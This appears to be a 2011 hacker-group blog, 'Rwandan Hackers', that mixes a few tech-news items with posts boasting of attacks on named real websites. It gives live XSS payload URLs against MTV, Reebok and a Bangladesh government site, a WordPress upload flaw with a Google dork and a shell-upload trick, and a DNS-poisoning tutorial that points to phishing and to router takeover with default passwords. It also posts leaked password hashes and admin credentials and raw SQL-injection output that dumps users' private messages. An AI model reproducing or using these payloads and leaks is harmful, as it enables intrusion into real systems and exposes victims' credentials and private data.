Saturday, November 26, 2011

Facial Recognition Technology In Google+


One of the fastest growing social network Google Plus adds more facilities. The fastest growing social network, Google Plus, keeps improving its arsenal in the battle with rivals like Facebook and Twitter. Google’s newest heavy weapon is: face detection. This technology allows users to tag the photos quicker and easier than before, without manually entering the identity for individual pictures.
When the user decides to publish an entire photo album, the new face detection feature will display in one place all the faces found in that album. Later on, grouping photos according to the persons that appear in them will be much easier and then tag them with the name and the email will be made with just a few keystrokes. Users can access this new feature from three different places.
One way is to create an album from the sharebox or to add photos to an existing album. Once the upload is complete, Google will recognize the faces and the tagging feature will appear. Another way is to add photos from sharebox and to follow the same steps and Tag People when this option appears. Or, there is the possibility of tagging an entire album using button just above the photo previews.
To respect the people’s right to privacy, after the tagging, every person that appears in the photos will be informed and they can decide if they approve the tagging or not.
Initially, Google provided face detection features with Picasa, but after a while, this service was renamed Google Photos. To gear up for further improvements, Google acquired PittPatt, and its patents for the technology used in face detection and live tracking. Now what Google cooked up in this department is available for Google + users to enjoy.

Friday, November 25, 2011

Multiple Vulnerability found on www.mtn.co.rw

Multiple sql injection found on www.mtn.co.rw by Rwandan Hackers
Using the vulnerability an attacker can exploit the entire database and gain illegal access
Vulnerable Website

Sudan Airways mailbox database leaked


Sudan Airways mailbox database Hacked .Leaked on Pastebin. The Targeted domains are sudanair.com  & omyalphaserver.com . This Include more than 100's of Usernames, Emails, Passwords.


array('username'=>'somewhat@omyalphaserver.com','password'=>'$1$ac09c20e$5Xcbb/U23YODtkknAb90X/','name'=>'Some What','maildir'=>'omyalphaserver.com/somewhat/','quota'=>'10240000','local_part'=>'somewhat','domain'=>'omyalphaserver.com','created'=>'2011-08-03 02:08:31','modified'=>'2011-08-03 02:08:31','active'=>'1'),
  array('username'=>'omar@omyalphaserver.com','password'=>'$1$87e8e56b$EOCSPLTJr25/BfRXIZfcW0','name'=>'Omar','maildir'=>'omyalphaserver.com/omar/','quota'=>'10240000','local_part'=>'omar','domain'=>'omyalphaserver.com','created'=>'2011-08-05 15:33:13','modified'=>'2011-08-05 15:33:13','active'=>'1'),
  array('username'=>'abcdabcd@omyalphaserver.com','password'=>'$1$448702c3$yhjzt828q1yKkbLxTIy5o/','name'=>'ABCD','maildir'=>'omyalphaserver.com/abcdabcd/','quota'=>'10240000','local_part'=>'abcdabcd','domain'=>'omyalphaserver.com','created'=>'2011-08-05 15:38:34','modified'=>'2011-08-05 15:38:34','active'=>'1'),
  a

Wednesday, November 23, 2011

www.airipa.it defaced by Rwandan Hackers

Multiple vulnerability found on http://www.airipa.it/ By Rwandan Hackers.there are multiple SQLi vulnerability.
Using the vulnerability an attacker can exploit the entire database and gain illegal access

SHELL INFO:

Monday, November 21, 2011

Is it hard to crack full Disk Encryption For Law Enforcement ?


If you'd rather keep your data private, take heart: disk encryption is a lot harder to break than techno-thriller movies and TV shows make it out to be, to the chagrin of some branches of law enforcement. MrSeb writes with word of a paper titled "The growing impact of full disk encryption on digital forensics" that illustrates just how difficult it is. According to the paper, co-authored by a member of US-CERT.

Abstract of Paper is available here, and Short Info written below:
The increasing use of full disk encryption (FDE) can significantly hamper digital investigations, potentially preventing access to all digital evidence in a case. The practice of shutting down an evidential computer is not an acceptable technique when dealing with FDE or even volume encryption because it may result in all data on the device being rendered inaccessible for forensic examination. To address this challenge, there is a pressing need for more effective on-scene capabilities to detect and preserve encryption prior to pulling the plug. In addition, to give digital investigators the best chance of obtaining decrypted data in the field, prosecutors need to prepare search warrants with FDE in mind. This paper describes how FDE has hampered past investigations, and how circumventing FDE has benefited certain cases. This paper goes on to provide guidance for gathering items at the crime scene that may be useful for accessing encrypted data, and for performing on-scene forensic acquisitions of live computer systems. These measures increase the chances of acquiring digital evidence in an unencrypted state or capturing an encryption key or passphrase. Some implications for drafting and executing search warrants to dealing with FDE are discussed.

The paper does go on to suggest some ways to ameliorate these issues, though Better awareness at the evidence-gathering stage would help, but it also suggests “on-scene forensic acquisition” of data, which involves ripping unencrypted data from volatile, live memory with the cryogenic RAM freezing technique, presumably). Ultimately, though, the researchers aren’t hopeful: “Research is needed to develop new techniques and technology for breaking or bypassing full disk encryption,” concludes the paper.

Friday, November 18, 2011

Railway Website of Srilanka is SQL-i Vulnerable (DB Hacked By Rwandan Hackers)

The official website of Srilankan Railway railway.gov.lk is vulnerable to SQL-i said Zero. He also hacked into the database and exposed secretes information like DB name, DB Table, admin details & other online user details.


Vulnerable Website:- 
http://www.railway.gov.lk/

To see the hacked DB click Here

Thursday, November 17, 2011

#Anonymous Web Surfing Tools

anonymous_mask110825163504.jpg (652×381)

HideMyAss
Tor
 download #Tor from https://www.torproject.org/
Guardster
Check out Guardster # http://www.guardster.com/
MegaProxy
Fsurf
Checkout Fsurf # http://www.fsurf.com/
Privoxy
You can download Privoxy from https://sourceforge.net/projects/ijbswa/files/

Online Anonymous Proxy
Checkout Online Anonymous Proxy # http://zend2.com/
TryCatchMe
Checkout TryCatchMe # http://www.trycatchme.com/
Heeky
Checkout Heeky # http://www.heeky.com/
Web4Proxy
Checkout Web4Proxy # http://www.web4proxy.com/

Turn Off Your Computer In Few Seconds

jpg (225×225)


Sometimes we are in a hurry. Then we have to turn off our PC directly. But this causes a great harm of our PC. So, I will show you a trick by which you will be able to turn off your PC within a few seconds (Approximately within  5 seconds). This will not do any harm to your PC. Follow my steps to do that…


  • Press Ctrl+Alt+Delete. Task Manager will appear.
  • Then click on Shut Down.
  • Then press and hold Ctrl key in your keyboard and in the meantime click on Turn off.
  • Now your PC will shut down within a few seconds.              
Windows Task Manager
Note :- This works in only Windows xp 

Popular Ways To Hack And Crack A Website



Hacking a website not only means taking the whole control of website but can be either changing the website datas or make the website down by making denial of serviceattack.Here in this article we will see some possible ways of attacking a website.A website can be attacked in any one of the following ways.

  • Password Cracking
  • Simple SQL Injection Hack
  • Brute force attack for servers
  • Denial of service
  • PASSWORD CRACKING

The first and foremost thing that every hacker must need to hack a website is the hostingIP address of the website.You can directly find the IP address of any website from yourcommand prompt itself.

1. For that open command prompt (window + r) and type cmd and hit enter.
2. Type the following command followed by the URL of the website

nslookup URL addressFor example

nslookup www.realhackings.comand hit enter.you can see a window as shown below with the ip address of the website

Now you have got the IP address of the website.next step is to scan the IP we have got just now to see which protocols the Website at this IP is using 

For scanninng DOWNLOAD IP scanner and open it you can see a window as shown below.Just paste the IP you have just got and click scan button.



In the above image FTP is shown,That means this website is using FTP to access to its servers.just double click on the FTP to see a window as shown below


Now this is the final stage.When you enter exact username and password you can login to that website and do whatever you like.To find this username and password we have to dobrute force attack

BRUTE FORCE ATTACK

In cryptanalysis, a brute force attack is a method of defeating a cryptographic scheme by trying a large number of possibilities; for example, exhaustively working through all possible keys in order to decrypt a message.Well, to put it in simple words, brute-force attack guess a password by trying all probable variants by given character set. Eg. checking all combination in lower Latin character set, that is 'abcdefghijklmnopqrstuvwxyz'. Brute-force attack is very slow. For example, once you set lower Latin charset for your brute-force attack, you'll have to look through 217 180 147 158 variants for 1-8 symbol password. It must be used only if other attacks have failed to recover your password.For attacking any account using this technique you should need high patience and it will take a lot of time depending upon the number of characters

Denial of service ( Ddos attack ):

A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.this is not actually hacking a webite but it is used to take down a website.

If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking

SQL INJECTION

SQL injection is a vulnerability that allows an attacker to influence the queries that are passed to the back-end database.It has been present since the time databases have been attached to the web applications.Before understanding the how SQL injection attacks we need to understand the Simple Three Tier Architecture or a Four Tier Architecture.This will clear your basics and give you a rough idea of how database-driven web applicationswork.

NOTE: This is only for the website owners to test their websites for different vulnerabilities and to enable maximum security.






DNS Hacking/Hijacking Tutorial

This is an introduction to DNS poisoning which also includes an example of quite a nifty application of it using the IP Experiment. It’s purely educational, so I’m not responsible for how you use the information in it.
To start, you’ll need
• A computer running Linux (Ubuntu in my case)
• A basic understanding of how the Domain Name System (DNS) works.
Note that this is a more advanced topic; don’t try this if you don’t know what you’re doing.

Why DNS?


The DNS provides a way for computers to translate the domain names we see to the physical IPs they represent. When you load a webpage, your browser will ask its DNS server for the IP of the host you requested, and the server will respond. Your browser will then request the webpage from the server with the IP address that the DNS server supplied.
If we can find a way to tell the client the wrong IP address, and give them the IP of a malicious server instead, we can do some damage.


Malicious DNS Server


So if we want to send clients to a malicious web server, first we need to tell them its IP, and so we need to set up a malicious DNS server.
The server I’ve selected is dnsmasq – its lightweight and the only one that works for this purpose (that I’ve found)
To install dnsmasq on Ubuntu, run sudo apt-get install dnsmasq, or on other distributions of Linux, use the appropriate package manager.


Once you’ve installed it you can go and edit the configuration file (/etc/dnsmasq.conf)


sudo gedit /etc/dnsmasq.conf


The values in there should be sufficient for most purposes. What we want to do is hard-code some IPs for certain servers we want to spoof


The format for this is address=/HOST/IP


So for example;


address=/facebook.com/63.63.63.63


where 63.63.63.63 is the IP of your malicious web server


Save the file and restart dnsmasq by running


sudo /etc/init.d/dnsmasq restart


You now have a DNS server running which will redirect requests for facebook.com to 63.63.63.63


Malicious Web Server


You probably already have a web server installed. If not, install apache. This is pretty basic, so I won’t cover it here.


There are a couple of things you can do with the web server. It will be getting all the traffic intended for the orignal website, so the most likely cause of action would be to set up some sort of phishing site


I’ll presume you know how to do that though


Another alternative is to set up some sort of transparent proxy which logs all activity. I might come back to this in the future.


I Can Be Your DNS Server Plz?


An alternative is to, instead of a spoof webserver, set up a Metasploit browser_autopwn module . You can have lots of fun with that


But how do you get a victim? Well this is where my project, the IP Experiment could come in handy


If you don’t know, the IP Experiment basically harvests people’s IPs through websites such as forums and scans them for open ports. A surprising number of these IPs have port 80 open and more often that not, that leads straight to a router configuration mini-site. ‘Admin’ and ‘password’ will get you far in life; its fairly easy to login and change the DNS settings.

Wednesday, November 16, 2011

XSS vulnerability found by Rwandan Hackers on (reebok,mtv)

xss vulnerability found by Rwandan Hackers on www.mtv.co.uk and www.mtv.co.uk


LINK:
http://www.mtv.co.uk/search?k=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20RWANDAN%20HACKERL%3C/MARQUEE%3E%3Cimg%20src=%22http://nanojv.files.wordpress.com/2010/08/rwanda-map3.png%22%20img%3E&op=Search




LINK:
http://www.reebok.com/IN/search?t=%3E%22%3E%3CMARQUEE%3EHACKED%20BY%20RWANDAN%20HACKERS%3C/MARQUEE%3E%3Ciframe+src+%3D%22http://rwandan-hackers.blogspot.com/%22+width%3D%22100%25%22+height%3D%22100%25%22%3E%3C%2Fiframe%3E&Submit=Go



National Telecommunication Authority of Nepal Hacked by Rwandan Hackers

National Telecommunication Authority of Nepal hacked by Rwandan Hackers. According to the hacker there
was SQL-i vulnerability on their site, using that they hacked the entire Database exposed including admin details

 Website:- 


Vulnerable Link:-  
www.nta.gov.np/en/aboutus/index.php?id=7

 



Exposed DB & Admin Credentials:-

##############ADMIN DETAILS#####################
USERNAME : Administrator
PASSWORD : cWccBbcbcLPCAYtMBA+c9jz6Q/Gvgn5FEPWxuwewFwY


##############SERVER DETAILS####################
web server operating system: Linux Debian or Ubuntu 6.0 (unstable sid or testing squeeze)
web application technology: Apache 2.2.16
back-end DBMS: MySQL 5.0

available databases [2]:
[*] dbase_nta
[*] information_schema

Vulnerability Found by Rwandan Hackers on The Official Website of Ministry of Planning (Bangladesh Govt.)

Non persistent XSS vulnerability found by Rwandan Hackers on the
official website of Bangladesh Planning Commission (Ministry of Planning Bangladesh Govt.)

Brief About Bangladesh Planning Commission:-

The Bangladesh Planning Commission had its roots in pre-independence Bangladesh. In the mid 1950s a Provincial Planning Board was established under the United Front Government of the then East Pakistan (present Bangladesh). It was an important agency for formulating investment programmes and for negotiating with the Central Government of Pakistan for an adequate share of the financial resources for the development of East Pakistan. The Planning Board undertook the task of appraising and evaluating East Pakistan development projects of a certain size. Later the Bangladesh Government in exile during the war of independent in 1971 established a Planning Cell, which was an embryonic start of the present Planning Commission. The Planning Cell established during the war of liberation was mainly concerned with formulating a programme of reconstruction and rehabilitation of the economy of post-independence Bangladesh.

Vulnerable Website:-
http://plancomm.gov.bd/ 


Vulnerable Link:-
http://plancomm.gov.bd/signin.asp?msg=%22Hacked+by+cyuzuzo%3E%3Cscript%3Ealert%28%22Hacked+by+RWANDAN%20HACKERS%22%29%3C%2Fscript%3E3E

Sunday, November 13, 2011

Bizztrust : The Most Secure Android Phone

With companies these days justifiably concerned about the security of the mobile devices provided to their workforce, many workers find themselves carrying around two mobile phones - one for personal use and another for business. Sure, mobile phones aren't the huge pocket-stretching devices they once were but for the sake of convenience, one is most definitely better than two.

A new German project makes Android phones significantly more secure for business communications--this could change the way people use smartphones, entirely.The Germans are an efficient lot, and when it comes the quality of their automobiles, well Mercedes Benz, BMW and Audi says it all, don’t they? The Swedish are also in with a shout for the safest car in the market, but when it comes to having the world’s most secure Android-powered phone, the Germans have it down pat after discovering a method to develop super-secure virtual “work phones” on Android-powered devices.

A version of Android called BizzTrust creates two partitions in Android--one for personal use and another super-secure one for business. The new product has the potential to create headaches for Research In Motion (RIM), which uses security as a major selling point for BlackBerrys.
Features
  • Protection of business data
  • No restrictions for private use
  • Secure enterprise communication (encryption)
  • Remote management and update
  • Supports bring-your-own-device strategy
  • Automatic policy enforcement
This allows users to install all the potentially dangerous apps they like on the personal partition, while protecting access to business apps and data stored on the other partition. Even if attackers manage to infiltrate an unsecured app, they cannot use it to access company data, and the impact of the attack is confined to the private data on the smartphone.Users are able to switch between work and home functions with two clicks of the touchscreen while a color symbol lets users know whether they're in the business (red) or personal (green) area.

The modified Android software will debut on Tuesday, October 11 at the it-sa computer security show in Germany. Bizztrust is the end result of a joint effort by the Fraunhofer trade group and the Center for Advanced Security Research Darmstadt (CASED).According to CASED's Ahmad-Reza Sadeghi, the Android mod "significantly improves the security of today's mobile terminals at no cost to user-friendliness." Users toggle between their work and personal virtual phones by playing with a touchscreen slider; non-secure personal applications can be installed to their heart's content.

That approach may be convenient to workers, but their interests and those of an IT department can differ. Most employees would likely prefer unlimited use of their smartphones, installing and using whatever programs they like even though that can open the door to hackers seeking to attack a business.

6 WEBSITE HACKED BY RWANDAN HACKERS



6 website Hacked by Rwandan Hackers . They used a new vulnerability on wordpress website

Vulnerable Website:-
http://www.labrocanteduweb.fr/wp-content/uploads/2011/11/hacked.txt

Vulnerability on Wordpress found by Rwandan Hackers

WordPress Easy Comment Upload Vunerablity

Google Dork

"inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php"

/wp-content/plugins/easy-comment-uploads/upload-form.php

Index of /wp-content/plugins/easy-comment-uploads

Open Google and enetr any dork which Given,

Now selct any website

and goto this url site.com/wp-content/plugins/easy-comment-uploads/upload-form.php

You'll Got Upload Option here :)

Now Upload Your Deface ....

and check it here site.com/wp-content/uploads/2011/05/yourfilehere

Note :- In some websites you can Upload your deface in txt on only ... and you can upload shell in 50% sites only ... upload shell in image format ex; shell.asp;.jpg

Live Demo :-

http://equator-indonesia.com/

http://equator-indonesia.com/wp-content/plugins/easy-comment-uploads/

http://www.findthepearl.com/wp-content/plugins/easy-comment-uploads/upload-form.php

http://equator-indonesia.com/wp-content/uploads/2011/11/hacked.tx

Saturday, November 12, 2011

Harvard Computer Society Hacked By Rwandan Hacker


Official website of Harvard Computer Society get hacked by RWANDN HACKERS. According to the hacker the website of Harvard Computer Society has QuiXplorer 2.3 <= Bugtraq File Uploading vulnerability. Using this flaws an attacker can easily upload malicious files, php shells and gain access into the  entire web-server. 

Target Site:-
http://www.hcs.harvard.edu/

Hacked Page:-
http://www.hcs.harvard.edu/~eac/letters/filestorage/cyulox.html

Friday, November 11, 2011

Hackers Used The MIT Server To Compromise other Websites

 
A server belonging to the Massachusetts Institute of Technology was commandeered by hackers who used it to launch attacks against other websites as part of a larger drive-by download campaign, according to antivirus vendor BitDefender.
"One MIT server (CSH-2.MIT.EDU) hosts a malicious script actively used by cyber-crooks to scan the web for vulnerable websites," the BitDefender researchers who spotted the attack said in a blog.
When the script finds a server with phpMyAdmin version 2.5.6 through 2.8.2, it exploits a vulnerability in the application and injects malicious code into the underlying databases.                
This attack campaign started in June and resulted in over 100,000 compromised websites so far, said BitDefender spokeswoman Loredana Botezatu.
The company's researchers believe that the attacks are related to the Blackhole Exploit Pack, one of the most popular drive-by download toolkits currently used by cyber criminals.
Users visiting websites compromised in this campaign will be redirected to exploits for vulnerabilities in Java and other browser plug-ins, which try to install malware on their computers.
BitDefender said that it tried to alert MIT about the security breach on their server, but received no reply. The institution did not answer requests for comment sent by IDG.
As far as the BitDefender researchers could tell, the server is still online, but no longer attacking websites. Hackers prefer to abuse servers from large organizations because requests sent from them are more likely to pass network filters, according to the researchers.

XSS Vulnerability Found By Rwanadan Hackers on the Official Website of Tom Cruise

Rwandan Hacker "cyuzuzo" found non-persistent XSS Vulnerability on the Official Website of Famous Hollywood Actor Tom Cruise


Tom Crusie:-

Vulnerable Website:-

Vulnerable Link:-
Click Here

Thursday, November 10, 2011

Cross Site Scripting Vulnerability on inyarwanda.com

Non-persistent XSS vulnerability found by cyuzuzo (Rwandan Hacker) on inyarwanda.com

Site:-
http://inyarwanda.com/

Vulnerable Link:-
Click Here

Wednesday, November 9, 2011

Vulnerability on Inyarwanda.com by Rwandan Hackers

Multiple vulnerability found on Inyarwanda.com By Rwandan Hackers.there are multiple SQLi vulnerability.
Using the vulnerability an attacker can exploit the entire database and gain illegal access
Vulnerable Website
SQL-i vulnability link: 
 Server info:

Host IP: 67.18.17.130
Web Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.17
Keyword Found: turi
Injection type is String (')
DB Server: MsSQL Blind
Injection type is blind!
Length of 'Current DB' is 15
Current DB: masjos_inyarwan
Column found: usertype
Column found: firstname
Column found: lastname
Column found: email
Column found: datejoined
Column found: website
Column found: issuperuser
Column found: photo
Column found: joincode
Count(column_name) of information_schema.columns Where table_schema=0x6D61736A6F735F736F6E676C697374 AND table_name=0x6D657373616765735461626C65 is 6
Column found: time_sent
Column found: messageFrom
Column found: messageTo
Column found: messageObject
Column found: messageContent
Column found: message_id
Count(column_name) of information_schema.columns Where table_schema=0x6D61736A6F735F736F6E676C697374 AND table_name=0x706F6C6C734F7074696F6E73 is 3
Column found: option_name
Column found: poll_id
Column found: total_voters
Count(column_name) of information_schema.columns Where table_schema=0x6D61736A6F735F736F6E676C697374 AND table_name=0x70705F70617965725F656D61696C is 2
Column found: id
Column found: address
Count(column_name) of information_schema.columns Where table_schema=0x6D61736A6F735F736F6E676C697374 AND table_name=0x70705F7472616E73616374696F6E is 4
Column found: id
Column found: transaction_number
Column found: pp_payer_email_id
Column found: user_id
Count(*) of masjos_songlist.messagesTable is 33
Data Found: message_id=15621108
Data Found: messageContent=Hey,masjosirinho , i want to add you as my friend on Inyarwanda , because we can come to know each other better and share music or photos.
Data Found: messageObject=Friendship request
Turning off 'bypass illegal union' and retrying!
Data Found: messageTo=
Data Found: messageFrom=udalia01
Data Found: message_id=209678900
Data Found: messageContent=Hey,kananga , i want to add you as my friend on Inyarwanda , because we can come to know each other better and share music or photos.
Data Found: messageObject=Friendship request
Turning on 'bypass illegal union' and retrying!
Data Found: messageTo=
Data Found: messageFrom=necle05
Data Found: message_id=290330515
Data Found: messageContent=Hey,masjosirinho , i want to add you as my friend on Inyarwanda , because we can come to know each other better and share music or photos.
This is a music production producing Jayels Family songs and videos
Data Found: messageObject=Friendship request
Turning off 'bypass illegal union' and retrying!
Data Found: messageTo=
Data Found: messageFrom=JF SOUNDS INC
Data Found: message_id=301374170
Data Found: messageContent=Hey,kananga , i want to add you as my friend on Inyarwanda , because we can come to know each other better and share music or photos.
Data Found: messageObject=Friendship request
Turning on 'bypass illegal union' and retrying!
Data Found: messageTo=
Data Found: messageFrom=mwarabu
Data Found: message_id=324264294
Data Found: messageContent=Hey,kananga , i want to add you as my friend on Inyarwanda , because we can come to know each other better and share music or photos.
Data Found: messageObject=Friendship request
Turning off 'bypass illegal union' and retrying!
Data Found: messageTo=
Data Found: messageFrom=luckh20
Data Found: message_id=345110140
Data Found: messageContent=Hey,kananga , i want to add you as my friend on Inyarwanda , because we can come to know each other better and share music or photos.
Data Found: messageObject=Friendship request
Turning on 'bypass illegal union' and retrying!
Data Found: messageTo=
Data Found: messageFrom=elise
Data Found: message_id=356466499
Data Found: messageContent=Hey,kananga , i want to add you as my friend on Inyarwanda , because we can come to know each other better and share music or photos.
Data Found: messageObject=Friendship request
Turning off 'bypass illegal union' and retrying!
Data Found: messageTo=
Data Found: messageFrom=serginho
Data Found: message_id=359906520
Data Found: messageContent=Hey,kananga , i want to add you as my friend on Inyarwanda , because we can come to know each other better and share music or photos.
Data Found: messageObject=Friendship request
Turning on 'bypass illegal union' and retrying!
Data Found: messageTo=
Data Found: messageFrom=kamana
Data Found: message_id=367940213
Data Found: messageContent=Hey,masjosirinho , i want to add you as my friend on Inyarwanda , because we can come to know each other better and share music or photos.
Data Found: messageObject=Friendship request
Turning off 'bypass illegal union' and retrying!
Data Found: messageTo=
Data Found: messageFrom=kananga
Data Found: message_id=490640007
Data Found: messageContent=Hey,masjosirinho , i want to add you as my friend on Inyarwanda , because we can come to know each other better and share music or photos.